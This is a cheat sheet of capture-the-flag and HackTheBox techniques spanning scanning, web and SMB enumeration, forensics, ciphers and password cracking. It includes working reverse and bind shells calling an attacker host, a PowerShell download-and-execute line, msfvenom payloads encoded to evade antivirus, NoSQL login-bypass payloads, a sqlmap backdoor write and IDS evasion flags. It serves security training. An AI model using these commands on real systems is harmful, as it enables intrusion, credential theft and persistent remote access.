A currated list of all capture the flag tips and strategies to solve Online CTF challenges and Hackthebox Machines.

• System Hacking
• Web Hacking
• File Hacking
• Cryptography
• Forensics
• Password Cracking
• Privilige Escalation

To discover hosts, services, and vulnerabilities efficiently in CTF environments, Nmap is a critical tool. Below are curated commands and strategies:

nmap -sn 10.10.0.0/24

Use this to quickly find which machines are up.

nmap -sV <HOST_IP>

Identify open ports and the version of services running.

nmap --script vuln <HOST_IP>

Uses default vulnerability detection scripts against known services.

nmap -sS -T4 -A -p- <HOST_IP>

Scans all 65535 TCP ports with OS, version detection, script scanning and traceroute.

nmap --script ssl-enum-ciphers -p 443 <HOST_IP>

Displays supported SSL/TLS ciphers for HTTPS services.

• Scan Specific Ports Quickly:

nmap -sS -p 21,22,80,443 <HOST_IP>

Focus on commonly used service ports.

• Use Top Ports Only (Fast Scan):

nmap --top-ports 100 -T4 <HOST_IP>

Scans the 100 most common ports.

• UDP Scanning:

nmap -sU -T4 -F <HOST_IP>

Useful for services like DNS (53), SNMP (161).

• Brute Force Login Scripts (use responsibly):

nmap --script ftp-brute -p 21 <HOST_IP>

Try brute force login on exposed FTP.

• Find HTTP Hidden Paths or Directories:

nmap --script http-enum -p 80 <HOST_IP>

List web directories.

• Detect SMB Shares:

nmap --script smb-enum-shares -p 445 <HOST_IP>

Helpful for lateral movement or sensitive info.

• Aggressive Script Scan for All Services:

nmap -sC -sV <HOST_IP>

Runs a set of default scripts for information gathering.

• Scan Output to File (For Notes):

nmap -sV -oN scan.txt <HOST_IP>

Useful for documentation or later review.

Leverage Nmap's script database (ls /usr/share/nmap/scripts/) to explore more targeted scripts based on your CTF scenario.

Stay stealthy when required, and always adapt your scanning strategy to the time constraints and rules of the challenge.

To passively discover machines on the network, use Netdiscover. It listens for ARP requests to identify live hosts without sending packets, making it ideal for stealth reconnaissance in CTFs or red team exercises.

netdiscover -i <INTERFACE>

If unsure of your interface, identify it using:

ip a
# or
ifconfig

Sample Output:

Currently scanning: 192.168.17.0/16   |   Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 8 hosts.   Total size: 480
_____________________________________________________________________________
 IP              At MAC Address       Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.1.1      11:22:33:44:55:66         1      60  NETGEAR                                                       
192.168.1.2      21:22:33:44:55:66         1      60  Apple, Inc.                                                   
192.168.1.8      41:22:33:44:55:66         1      60  Intel Corporate 

• Use with -r flag to scan specific subnet range:

netdiscover -r 10.10.0.0/24

Faster than default mode for known ranges (e.g., in HackTheBox or TryHackMe labs).

• Combine with Wireshark or tcpdump: Use netdiscover to find active hosts and then monitor them with packet sniffers.

• Scan for MAC vendor anomalies: Identify devices with spoofed MACs (e.g., "Private" or "Unknown") which might be attacker-controlled.

• Run in background during a CTF session: Keep netdiscover running in a separate terminal to monitor new devices that join the network.

• Use in stealth mode: Unlike Nmap, this does not actively probe. Good for avoiding detection in blue team CTF scenarios.

Important: Netdiscover works only on local networks. It cannot discover hosts outside of your subnet.

For maximum effectiveness, always complement passive scanning with active tools (like Nmap) once initial targets are discovered.

To scan for web vulnerabilities using Nikto, a powerful web server scanner that tests for thousands of known issues.

nikto -h <HOST_IP>

This tool is effective for identifying outdated software, insecure configurations, and common CVEs.

• Scan HTTPS hosts with SSL support:

nikto -h https://<HOST_IP>

Detects SSL-specific vulnerabilities.

• Save output to a file for review or reporting:

nikto -h <HOST_IP> -output nikto_scan.txt

Useful for documentation or post-exploitation analysis.

• Scan specific ports (e.g., 8080, 8443):

nikto -h <HOST_IP> -p 8080

Often CTFs run web servers on non-standard ports.

• Use with web proxies (e.g., Burp Suite):

nikto -h <HOST_IP> -useproxy http://127.0.0.1:8080

Intercept and analyze requests manually.

• Combine with other tools: Use Nikto findings to feed into further attacks with tools like gobuster, wpscan, or custom scripts.

Note: Nikto is noisy and easily detectable. Avoid using in stealth/red team scenarios unless allowed.

When ports 80 (HTTP) or 443 (HTTPS) are open, it likely indicates a web service. This presents an opportunity to enumerate for flags, directories, and version-specific vulnerabilities.

• Check for hidden paths (robots.txt):

curl http://<HOST_IP>/robots.txt

Common in CTFs for holding easter eggs or clues.

• Identify the Web Server and Version:

curl -I <HOST_IP>

Sample Output:

HTTP/1.1 200 OK
Date: Mon, 11 May 2020 05:18:21
Server: gws
Last-Modified: Mon, 11 May 2020 05:18:21
Content-Length: 4171
Content-Type: text/html
Connection: Closed

Look at the Server: header to find out if it’s Apache, Nginx, or a specific vendor.

This may indicate:

• Presence of Intrusion Detection System (IDS)
• Port knocking mechanism in place

• Rescan with a delay:

sleep 10 && nmap -p 80 <HOST_IP>

Sometimes port availability changes after time or after other ports are probed.

• Use TCP connect scan to bypass SYN scan restrictions:

nmap -p 80 -sT <HOST_IP>

Example output:

PORT     STATE  SERVICE
80/tcp   closed http

SYN scans (-sS) may be blocked or filtered by the firewall, while -sT (full TCP handshake) can bypass it in some setups.

• Use tools like whatweb or wappalyzer to detect CMS or frameworks.

whatweb <HOST_IP>

• Combine with gobuster or dirsearch for brute-forcing directories:

gobuster dir -u http://<HOST_IP> -w /usr/share/wordlists/dirb/common.txt

• Always check for default creds if CMS is identified (e.g., admin:admin, guest:guest).

• Use Burp Suite or ZAP for deeper inspection when a login portal or forms are found.

• Try alternative ports like 8080, 8000, or 8443 if no web app is found on 80/443.

Web services often hold CTF flags in directories, source code comments, or misconfigurations. Always inspect thoroughly!

To enumerate hidden directories and files on a web server, directory brute-forcing is essential in CTFs.

wfuzz -u http://<HOST_IP>/FUZZ/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

gobuster dir -u http://<HOST_IP>/ -w /usr/share/wordlists/dirb/common.txt -t 50

python3 dirsearch.py -u http://<HOST_IP>/ -e php,html,txt -x 403,404

• Try multiple extensions: CTF flags are often hidden as .php, .txt, .bak, etc.

-gobuster -x php,txt,bak

• Use recursive mode in tools like dirsearch to go deep into discovered folders.

• Filter out 403/404 responses to reduce noise and focus on valid paths.

• Look for backup files or config leaks like .git/, config.php, .env.

• Scan for hidden parameters using wfuzz:

wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://<HOST_IP>/index.php?FUZZ=test

• Check robots.txt and sitemap.xml for hints to hidden pages.

Use cewl to crawl a target website and generate a custom wordlist based on its content—useful for password attacks, username discovery, or directory bruteforcing.

cewl -w wordlist.txt -d 10 -m 1 http://<SERVER_IP>/

wc wordlist.txt
# 354  354 2459 wordlist.txt

• Increase depth (-d) to extract words from deeper pages (e.g., /about, /team, /login).
• Use -e to include email addresses in output:

cewl -e -w emails.txt http://<HOST_IP>/

• Use in combo with Hydra or Burp for login brute-force attacks.
• Run with a custom user-agent (-a) to bypass basic WAFs:

cewl -a "Mozilla/5.0" -w wordlist.txt http://<HOST_IP>/

• Use --with-numbers if the site includes numbers in words (e.g., admin123).

When ports 139/445 are open, the target may be running SMB (Server Message Block)—commonly misconfigured in CTFs, making it a goldmine for enumeration and exploitation.

smbclient -L \\\\<HOST_IP>

Lists available shares. If successful without credentials, the server allows anonymous login.

mkdir /mnt/smb
mount -t cifs //<HOST_IP>/<SHARE> /mnt/smb/ -o guest

Or use credentials:

mount -t cifs //<HOST_IP>/<SHARE> /mnt/smb/ -o username=<user>,password=<pass>

smbmap -H <HOST_IP> -u administrator -p password

Enumerates shares, permissions, and access level.

python3 /opt/impacket/examples/psexec.py administrator@<HOST_IP>

If credentials are valid and ADMIN$ is accessible, this will drop you into a SYSTEM shell.

• Use enum4linux for a quick, detailed SMB sweep:

enum4linux -a <HOST_IP>

• Look for backup files or password.txt in shares like Backups, Users, or C$.

• Use smbclient interactively to explore shares:

smbclient \\\\<HOST_IP>\\Backups
smb: \> ls

• Try null sessions (-N):

smbclient -L //<HOST_IP> -N

• If psexec.py fails, try wmiexec.py, smbexec.py, or atexec.py (from Impacket).

• Automate with tools like crackmapexec for wide-scale credential spraying:

crackmapexec smb <HOST_IP> -u users.txt -p passwords.txt

Virtual Hard Disk (VHD) files are often found in forensic or Windows-based CTF challenges. These can contain hidden flags, user profiles, or sensitive files.

7z l <FILENAME>.vhd

Quickly inspects the archive to confirm structure before mounting.

guestmount --add <FILENAME>.vhd --inspector -ro -v /mnt/vhd

• --inspector: Auto-detects and mounts the correct partition.
• -ro: Mounts as read-only (safe for analysis).
• -v: Enables verbose output.

Make sure libguestfs-tools is installed.

• Always check for .flag, .txt, or .zip inside Desktop, Downloads, Documents.
• Search for browser histories or credentials in:
  • AppData/Roaming
  • Users/<name>/Recent
• If guestmount fails, try manual partition detection:

fdisk -l <FILENAME>.vhd

Then mount using loop device:

mount -o ro,loop,offset=<OFFSET> <FILENAME>.vhd /mnt/vhd

• Use strings or binwalk to extract clues from within the VHD file:

strings <FILENAME>.vhd | grep flag

Use searchsploit to quickly find known exploits or vulnerabilities from the Exploit-DB repository.

searchsploit apache 1.2.4

Searches for Apache version-specific exploits in the local database.

• Use -x to open the exploit directly:

searchsploit -x exploits/unix/remote/12345.txt

• Mirror the database to ensure it’s up to date:

searchsploit -u

• Use quotes for precise matching:

searchsploit "Apache 2.4.49"

• Search inside PoCs for keywords (e.g., RCE, LFI):

searchsploit --www | grep RCE

• Search using CVE-ID if known:

searchsploit CVE-2021-41773

• For Metasploit directly:

msfconsole
> search type:exploit name:apache

If /wp-login.php is discovered during web enumeration, the target is likely running WordPress—a common and often vulnerable CMS in CTFs.

hydra -V -l admin -P wordlist.dic <HOST_IP> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

• Adjust F= string based on response for failed login.
• Capture login POST parameters using Burp Suite.

gem install wpscan
wpscan --url http://<HOST_IP> --enumerate u,vt,tt,cb,dbe --plugins-detection aggressive

• Use with credentials:

wpscan --url http://<HOST_IP> --usernames admin --passwords wordlist.dic

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOST <HOST_IP>
set USERNAME admin
set PASSWORD <password>
run

• Check /readme.html or wp-includes/version.php for WordPress version leakage.
• Always enumerate users first to reduce brute force attempts:

wpscan --url http://<HOST_IP> --enumerate u

• Scan for outdated plugins/themes—they’re frequent attack vectors.
• Look for writable upload directories or eval() usage in plugin files.
• Try LFI/SQLi on lesser-known plugins if source code or version is known.

If port 135 (or 445 with RPC over SMB) is open, it indicates a Windows host with Remote Procedure Call (RPC) capabilities. Misconfigured RPC access can expose usernames, shares, and domain info.

rpcclient -U "" <HOST_IP>

Press Enter when prompted for a password to attempt a null session.

• Enumerate users:

rpcclient <HOST_IP> -U "" -c "enumdomusers"

• Get detailed user info:

rpcclient <HOST_IP> -U "" -c "queryuser RID"

• Enumerate groups:

rpcclient <HOST_IP> -U "" -c "enumdomgroups"

• Find policies or domain info:

rpcclient <HOST_IP> -U "" -c "getdompwinfo"

• Chain with smbclient to access user directories based on enum results.

• Use RID cycling to brute-force usernames:

rpcclient <HOST_IP> -U "" -c "lookupsids S-1-5-21-XXXX-XXXX-XXXX-500"

• If credentials are found, use them with rpcclient -U user%pass <HOST> for full access.

PowerShell is a powerful post-exploitation and enumeration tool on Windows machines.

powershell.exe -exec bypass

Allows execution of unsigned scripts without modifying system-wide policy.

• Download and execute payloads:

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/rev.ps1')"

• Run encoded commands to evade detection:

powershell -EncodedCommand <Base64Payload>

• Use PowerView or Nishang for enumeration, privilege escalation, and persistence.

• Use -w hidden to suppress PowerShell window (post-exploit):

powershell -w hidden -exec bypass -File script.ps1

• Enumerate system info, users, and network:

Get-LocalUser
Get-LocalGroupMember administrators
Get-NetIPAddress

These exploit MongoDB’s flexible querying:

username[$ne]=null&password[$ne]=null
username[$gt]=admin&password[$gt]=admin
username[$regex]=.*&password[$regex]=.*
username[$in][]=admin&password[$in][]=admin

These payloads allow login by returning true on any non-null or regex match.

Try brute-forcing usernames one letter at a time:

username[$regex]=^a&password[$ne]=x
username[$regex]=^adm&password[$ne]=x

Check for response differences to confirm partial matches.

This helps discover valid users:

username[$regex]=^admin&password[$ne]=anything

If $where is supported (JS injection):

username=admin&password[$where]=this.password.length==6

Enumerate the length first, then extract char-by-char.

If errors don’t help, exploit time:

username=admin&password[$where]=sleep(5000)

Or for some frameworks:

username=admin&password[$where]=function() { sleep(5000); return true; }

If delay occurs, injection is successful.

git clone https://github.com/codingo/NoSQLMap
cd NoSQLMap
python3 nosqlmap.py

Use for:

• Dumping DBs
• Enumerating users
• Authentication bypass
• JS injection exploitation

1. Intercept login POST request.
2. Send to Intruder.
3. Fuzz with:
   • [$ne]=1
   • [$regex]=^a
   • [$where]=...

Monitor responses for variations.

If user exists:

username=admin&password[$ne]=invalid

If login succeeds, you’ve confirmed user admin exists.

To bypass:

username=admin&password[$gt]=

If admin panel access is via role:

role[$eq]=admin

Bypass weak sanitization:

• Use array parameters: username[$in][]
• Encode special characters: %24ne, %24regex
• JSON nested injection:

{"user":{"$gt":""}}

• Check login, search, filter, and API endpoints—anywhere user input reaches MongoDB.
• Explore headers (X-User, X-Auth) for NoSQL injection in hidden APIs.
• Always enumerate usernames before attempting bruteforce.
• Look for JavaScript-enabled backends to exploit $where.
• Chain NoSQLi with LFI, RCE, or misconfigured MongoDB access.

    * Reconnaissance
    * Scanning and Enumeration
    * Gaining Access
    * Maintaining Access
    * Covering Tracks

Recon is critical in CTFs. Use these tools to gather intelligence before exploiting.

• Whois, Nslookup, Dig, Dnsrecon – Basic DNS and domain info.
• Google Dorking (Google Fu) – Discover exposed files or directories:
  • site:<target.com> ext:log
  • intitle:index.of "backup"

• Sublist3r – Fast subdomain discovery:

  sublist3r -d target.com

• crt.sh – Public SSL certificate transparency logs.
• Amass – Extensive subdomain and DNS enumeration.

• Hunter.io – Discover associated emails.
• HaveIBeenPwned – Check email breach exposure.
• Clear Text Password Dataset – Build realistic password lists.

• Wappalyzer, WhatWeb, BuiltWith – Identify backend tech, CMS, or frameworks.
• Nmap – Version detection and port scanning.
• Netcat – Basic banner grabbing or listener setup.

• SecurityHeaders – Scan HTTP headers for misconfigurations.
• OWASP ZAP Proxy – Crawl and extract hidden files or admin paths.
• Burp Suite – Spider, Repeater, Intruder for thorough recon.

theharvester -d microsoft.com -l 200 -g -b google

• Use -b all for multiengine scraping.
• Target emails, domains, subdomains, hosts, employee names.

• Always run recon in parallel threads (subdomains, certs, emails, etc.).
• Use findings to create a custom wordlist for bruteforce (e.g., via cewl, crunch).
• Pivot findings into active attacks — open ports, login panels, emails, and misconfigs often lead to the first foothold.

Ping Sweep a network.

> $ nmap -sn <NETWORK>

SYN Scan with Speed of 4 and port of common 1000 TCP.

> $ nmap -T4 <NETWORK>

All Port scan with All Scanning including OS, Version, Script and Traceroute.

> $ nmap -T4 -A -p- <NETWORK>

To scan for UDP Ports (Dont scan all scans, as it takes lot of time).

> $ nmap -sU -T4 <NETWORK>

Payloads are code executed on the target after exploitation. In Metasploit, they’re categorized as Staged and Non-Staged.

windows/meterpreter_reverse_tcp

• Sends the entire payload at once.
• Easier to detect but simpler to use.
• More reliable in unstable networks.

windows/meterpreter/reverse_tcp

• Sends a small stager first, then downloads the full payload.
• Smaller footprint during delivery, useful for evading filters.
• More stealthy, but may break in flaky connections.

• Use msfvenom to generate standalone payloads:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f exe > shell.exe

• For web shell upload:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=4444 -f raw > shell.php

• Use multi/handler in Metasploit to catch the shell:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
run

• Encode payloads to evade AV:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -e x86/shikata_ga_nai -f exe > shell.exe

Shells are essential for post-exploitation access. They can be Bind Shells or Reverse Shells, depending on which side initiates the connection.

Target listens, and attacker connects in.

1️⃣ On Target (create shell):

nc -lvp <PORT> -e /bin/bash

2️⃣ On Attacker (connect to shell):

nc <TARGET_IP> <PORT>

Attacker listens, and target connects back.

1️⃣ On Attacker (listen):

nc -lvp 9001

2️⃣ On Target (trigger shell):

bash -c 'bash -i &> /dev/tcp/<ATTACKER_IP>/9001 0>&1'

perl -MIO -e '$p=fork;exit if $p;...'

• Use it when you gain command execution via web.
• Swap in your IP and port.
• Stable but easily detectable—upgrade shell after.

If you get a basic shell, upgrade it:

python -c 'import pty; pty.spawn("/bin/bash")'

And make it interactive:

CTRL+Z
stty raw -echo; fg
reset
export TERM=xterm

• Always try multiple shell methods: Bash, Python, Perl, PHP, Socat.
• Use rlwrap or script to wrap Netcat for history/navigation.
• Some machines block Netcat—use socat or mkfifo shell:

mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | nc <ATTACKER_IP> <PORT> > /tmp/f

• Check cron jobs or file uploads for persistence using reverse shells.

Buffer overflow exploits can be used to execute arbitrary code, often giving shell access. One key step is injecting shellcode into the program's memory.

Quick shellcode to spawn /bin/sh:

python -c "import pwn; print(pwn.asm(pwn.shellcraft.linux.sh()))"

(python -c "import pwn; print(pwn.asm(pwn.shellcraft.linux.sh()))"; cat) | ./vuln

• Combines shellcode and standard input to exploit buffer in real time.
• cat keeps the session alive after payload injection.

• Set architecture for shellcode:

context.arch = 'amd64'  # or 'i386'

• Debug with GDB:

gdb ./vuln

• Use pattern generation to find offset:

pwn cyclic 100
pwn cyclic -l <crash_value>

• Attach pwntools debugger:

p = gdb.debug("./vuln", gdbscript="b *main\ncontinue")

• Use ROPgadget to find useful instructions for ret2libc or ROP chaining.

Gobuster is a fast, flexible tool used to brute-force directories, files, and virtual hosts on web servers—critical for discovering hidden content during CTFs.

gobuster dir -u http://<IP_ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

• Use default extensions or combine with -x php,txt,bak for better results.

gobuster dir -u http://<IP_ADDRESS> \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php -c PHPSESSID=<COOKIE_VALUE>

• Useful when login is required or access is session-based.

• Target file extensions:

-x php,html,txt,bak,zip

• Change status code filters to include redirects, forbidden, etc.:

--status-codes 200,204,301,302,307,401,403

• Recursive brute-force (manually explore found directories).

• Use smaller wordlists for initial scan, then refine:

  • /usr/share/wordlists/dirb/common.txt
  • /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt

• Add user-agent to evade simple WAFs:

--user-agent "Mozilla/5.0"

• Scan HTTPS URLs with -k to ignore SSL validation (CTFs often use self-signed certs):

gobuster dir -k -u https://<IP_ADDRESS> -w ...

• Don't miss hidden admin or upload portals like:
  • /admin, /upload, /debug, /backup

SQLMap automates the detection and exploitation of SQL injection flaws. In CTFs, it’s a fast way to extract databases, users, tables, and even get shells.

1. Intercept a vulnerable POST request:

POST / HTTP/1.1
Host: <IP_ADDRESS>
...
search=help

2. Right-click → Save to File (e.g., search.req)

sqlmap -r search.req --batch --force-ssl

• -r: Use raw HTTP request file.
• --batch: Run without interactive prompts.
• --force-ssl: Useful for HTTPS endpoints.

• Extract full DB structure:

sqlmap -r search.req --dbs
sqlmap -r search.req -D <db_name> --tables
sqlmap -r search.req -D <db_name> -T <table_name> --dump

• Enumerate current DB, user, and version:

sqlmap -r search.req --current-db
sqlmap -r search.req --current-user
sqlmap -r search.req --banner

• OS Shell or File Write:

sqlmap -r search.req --os-shell
sqlmap -r search.req --file-write=backdoor.php --file-dest=/var/www/html/backdoor.php

• Test specific parameter (if request has multiple):

sqlmap -r search.req -p search

• Bypass WAFs:

--tamper=space2comment,randomcase

• Use cookies (if session required):

sqlmap -r search.req --cookie="PHPSESSID=<COOKIE>"

• Avoid IDS detection:

--random-agent --delay=1 --threads=1

PDFs in CTFs often hide flags using layers, compression, white text, or embedded objects.

1. Open PDF → Ctrl + A → Ctrl + C
2. Paste into Notepad or any plain text editor.

✅ Works if text is layered or colored white.

1. Open PDF in Inkscape
2. Repeatedly click "Ungroup" (Shift + Ctrl + G)
3. Look for:
   • White-on-white text
   • Hidden objects or overlays
   • Off-canvas data

Great for vector-based or image-embedded flags.

qpdf --qdf --object-streams=disable input.pdf output_uncompressed.pdf

• Converts PDF streams into readable text.
• Open with a text editor and search for flag, HTB, CTF{, etc.

• Search hex editors for embedded strings:

strings file.pdf | grep -i flag

• Use pdf-parser.py (by Didier Stevens) to inspect PDF objects:

pdf-parser.py input.pdf

• Try binwalk if the PDF is embedded with other files:

binwalk input.pdf

• Look for invisible/hidden layers in GIMP or Photoshop if it's image-heavy.

• Use OCR (tesseract) if text is embedded inside images:

tesseract image.png stdout

In CTFs, compressed files may hide flags deeply nested or disguised using alternate extensions or embedded formats.

Check the file header:

xxd <FILE_NAME> | head

• If it starts with 50 4B (PK), it’s likely a ZIP file, even if the extension is misleading.

binwalk -Me <FILE_NAME>

• -M: Enables recursive extraction of embedded files.
• -e: Automatically extracts known file types.
• Saves output in _FILE_NAME.extracted/.

• Use file command to confirm type:

file <FILE_NAME>

• Manually unzip if standard ZIP:

unzip <FILE_NAME>

• Use 7z for unknown or nested formats:

7z x <FILE_NAME>

• Inspect for password-protected archives inside:
  • Use fcrackzip or john to brute-force:

fcrackzip -v -u -D -p wordlist.txt protected.zip

• Sometimes .jpg, .png, or .docx hide zips internally. Use binwalk or steghide to detect.

• Loop unzipper for nested zips:

while file *.zip | grep -q 'Zip archive'; do for f in *.zip; do unzip "$f" -d "${f}_unzipped"; done; cd *_unzipped; done

CTF files often hide flags in binary, encoded, or obfuscated forms. Use basic Linux tools for deep inspection.

Use strings to extract ASCII-readable data:

strings <FILE> | grep -i flag

Use hexeditor to manually inspect binary layout:

hexeditor <FILE>

• Look for readable data, base64 patterns, and unexpected headers.
• Look for clues like flag{...}, HTB{...}, or even Unicode-encoded text.

If you see patterns like:

U2FsdGVkX1+VZmxhZ3s0aGFja2VkX2ZsYWd9==

The == ending suggests base64 encoding:

echo 'U2FsdGVk...' | base64 -d

strace -s 9999 -f -e trace=recv,read ./<PROGRAM>

• -f: Follow child processes.
• -s: Increase string capture size (default is 32).
• Watch for runtime flag output or hidden read events.

ltrace ./<PROGRAM>

• Reveals dynamic library calls, useful for uncovering:
  • Password checks
  • String comparisons
  • File reads

• Try XOR decoding if text looks binary but consistent:

xxd -p file | tr -d '\n' | xxd -r -p | xor_tool

• Use Ghidra or GDB to trace logic if strings are encrypted or manipulated in memory.

• Combine strace with tee or grep to live-watch extracted data.

• Check for Unicode, ROT13, or hex-encoded flags if base64 doesn’t reveal useful output.

A Caesar cipher is a simple substitution cipher where each letter is shifted by a fixed number in the alphabet.

If the challenge mentions "caesar", it’s likely using a basic shift cipher.

• Try all 25 shifts manually:

for i in {1..25}; do echo "ciphertext" | tr 'A-Za-z' "$(echo {A..Z} | sed -E "s/(.{$i})(.*)/\2\1/")$(echo {a..z} | sed -E "s/(.{$i})(.*)/\2\1/")"; done

Or use dCode Caesar Solver.

If ciphertext contains characters like ! or appears block-like:

• Likely a Caesar Box (Columnar Transposition) cipher.

Use: 👉 Caesar Box Solver

Paste text and bruteforce dimensions or square sizes.

• Look for clue words: "shift", "rotate", "move", "Julius", or "Rome".
• If numeric hints (like 3 or 13) are given, use them as shift values.
• Try reverse shift (ROT13 or ROT-N) using:

echo "ciphertext" | tr 'A-Za-z' 'N-ZA-Mn-za-m'

• Combine Caesar decoding with base64 or hex if multiple layers are used.

The Vigenère cipher is a polyalphabetic substitution cipher that uses a repeating key to shift letters.

Use this online bruteforce solver: 👉 Guballa Vigenère Solver

• Paste the ciphertext and let it auto-detect the key length and content.
• It uses frequency analysis and Kasiski examination behind the scenes.

• Clues like "key", "password", "repeating", or "polyalphabetic" often indicate Vigenère.

• Try common keys like:

  • flag, ctf, security, secret, pass

• If a partial plaintext or known word is visible, use a known-plaintext attack.

• If ciphertext is all caps with no spaces, suspect Vigenère or Playfair.

• Layered encoding (e.g., base64 → Vigenère → Caesar) is common—decode in reverse.

The One-Time Pad is an unbreakable cipher when used properly (random key, used once, same length as plaintext). In CTFs, it's often improperly implemented—making it crackable.

Use this online tool: 👉 OTP Decryption Tool

• Input the ciphertext and key (or guess/bruteforce if reused or predictable).
• Decryption is done via XOR of ciphertext and key.

If OTP is a red herring and you find an id_rsa file, use john to crack it:

/usr/share/john/ssh2john.py id_rsa > output.hash
john output.hash --wordlist=/usr/share/wordlists/rockyou.txt

✅ Often used to escalate after retrieving a user's private key in challenges.

• OTP ciphertext and key must be same length — verify before decoding.
• If a reused key is suspected, treat it like a Vigenère with XOR.
• Use hex editors or xxd to identify XOR patterns in binary OTP files.
• Check if the key is:
  • Hardcoded in source
  • Found in another file
  • Same as part of the flag

Images often hide flags using steganography, metadata, or embedded file structures.

file <FILE_NAME>

• Confirms true file type regardless of extension (e.g., PNG renamed to JPG).

exiftool <FILE_NAME>

• Reveals hidden fields like Author, Comment, or GPS coordinates.
• Look for unusual tags like Software, UserComment, or DocumentName.

Use zsteg for LSB & color-channel payloads (PNG only):

zsteg <FILE_NAME>

Use steghide for password-protected embedded content:

steghide extract -sf <FILE_NAME>

• Prompts for password—use rockyou.txt for brute-force attempts.

Brute-force steghide with steghide_brute (optional tool):

python steghide_brute.py -f <FILE_NAME> -w rockyou.txt

strings <FILE_NAME> | grep -i flag

• Flags often embedded as plaintext or ASCII in CTFs.

• Check alpha/transparency channels for hidden overlays.
• Use binwalk to detect embedded ZIPs, images, or files:

binwalk -e <FILE_NAME>

• Open image in hex editor (e.g., hexeditor) to inspect tail-end anomalies.
• Try OCR (for CAPTCHA-like flags or graphical encodings):

tesseract <FILE_NAME> stdout

• Check pixel data manipulation using stegsolve.jar or StegSpy for deeper analysis.

binwalk is used to analyze binary files (like images or firmware) for embedded files, compressed archives, or hidden content.

binwalk <IMAGE_NAME>

• Scans for magic bytes indicating ZIPs, PNGs, PDFs, compressed data, etc.

You can extract it manually:

mv <IMAGE_NAME> <FILE_NAME>.zip
unzip <FILE_NAME>.zip

binwalk -e <IMAGE_NAME>

• Extracts all identified files into _<IMAGE_NAME>.extracted/

binwalk -Me <IMAGE_NAME>

• Ideal for multi-layered CTF stego challenges.

• Use --dd to extract specific types manually:

binwalk --dd='.*' <IMAGE_NAME>

• Combine with steghide, exiftool, and zsteg after extraction.

• Inspect footer of embedded files — flags may be appended after legitimate content.

• Good for challenges involving firmware, DOCX/XLSX, or disguised file formats.

NTFS files may contain hidden data, alternate streams, or partitioned content—commonly leveraged in CTFs.

1️⃣ List Hidden Streams:

dir /R <FILE_NAME>

2️⃣ Extract Hidden Stream Content:

more <FILE_NAME>:<HIDDEN_STREAM>

or

cat <FILE_NAME>:<HIDDEN_STREAM> > output.<ext>

3️⃣ Use 7-Zip to extract .ntfs containers directly:

• Right-click → "Extract Here"

Mount the NTFS image:

sudo mount -o loop <FILENAME.ntfs> mnt/

• Explore mnt/ for flags in $MFT, $Recycle.Bin, or System Volume Information.

• Search for ADS (Alternate Data Streams) manually on Linux:

strings <FILE_NAME> | grep -i ":"

• Use ntfs-3g for full read/write NTFS access on Linux.

• Use sleuthkit or autopsy for forensic-level NTFS inspection.

• Check for base64 or zip files stored in ADS or hidden folders.

Use this method to image and extract deleted file systems remotely—commonly required in forensic or IR-based CTFs.

ssh username@<REMOTE_IP> "sudo dcfldd if=/dev/sdb | gzip -1 -" > extract.dd.gz

• dcfldd: Forensic-friendly dd with progress and hashing.
• gzip: Compress data during transfer.

gunzip extract.dd.gz

binwalk -Me extract.dd

• Recursively unpacks embedded files, file systems, and archived data.

• If dcfldd not available, use:

ssh user@host "sudo dd if=/dev/sdb bs=4M | gzip -" > disk.dd.gz

• Use photorec or foremost for file carving:

photorec /log /d output/ /cmd recover.cmd

• Mount partition for manual inspection:

sudo mount -o loop,ro,offset=<OFFSET> extract.dd mnt/

• Find offset using fdisk -l extract.dd

• Use fls and icat from SleuthKit for targeted recovery:

fls -r extract.dd
icat extract.dd <inode>

In CTFs, .pcap or .pcapng files may contain USB keyboard traffic, especially when analyzing hardware-level challenges.

Use tshark to extract USB data:

tshark -r <FILE_NAME.pcapng> -Y "usb.transfer_type == 1" \
-e frame.time_epoch -e usb.capdata -T fields

• usb.transfer_type == 1: Captures interrupt transfers (used for keyboard).
• usb.capdata: Extracts raw keystroke data.
• Pipe this output into a script to decode keystrokes into readable text.

Follow this detailed article: 👉 Reverse USB Keystrokes from PCAP (Kaizen CTF)

• Use Wireshark filters to explore:

  • usb.device_address
  • usb.transfer_type
  • usb.capdata
  • frame contains flag

• Look for HTTP, FTP, DNS, IRC traffic in normal .pcap files:

tshark -r capture.pcap -Y "http || ftp || dns" -T fields -e ip.dst -e frame.len

• Use NetworkMiner or tcpflow to reconstruct files or extract credentials.

• Use strings on PCAP for quick wins:

strings file.pcap | grep -i flag

Obfuscated JavaScript is often used in web-based CTFs to hide logic, flags, or backdoor payloads.

Use this online tool: 👉 JSNice

• Automatically formats and renames variables using probabilistic models.
• Helps understand logic flow and variable roles in obfuscated scripts.

• Look for base64, hex, or eval() patterns—common obfuscation tricks.
• Replace eval() with console.log() to inspect decoded payload.
• Use browser DevTools:
  • Paste obfuscated JS into the Console.
  • Step through with breakpoints.
• For heavy obfuscation:
  • Try Beautifier.io
  • Use prettier or js-beautify locally:

    npx prettier --write script.js

If the challenge references "JOHN", it's likely hinting at using John the Ripper to crack hashes or protected archives.

john <HASHES_FILE> --wordlist=/usr/share/wordlists/rockyou.txt

• Supports formats like MD5, SHA1, bcrypt, NTLM, etc.
• Automatically detects hash type in many cases.

john --list=formats | grep <type>

Or use [hash-identifier] or [NameThatHash].

Use: 👉 CrackStation

• Paste hash to check against massive precomputed tables.

• Convert formats using tools:

  • zip2john, rar2john, pdf2john, ssh2john, etc.

  zip2john secret.zip > hash.txt
  john hash.txt --wordlist=rockyou.txt

• View cracked passwords:

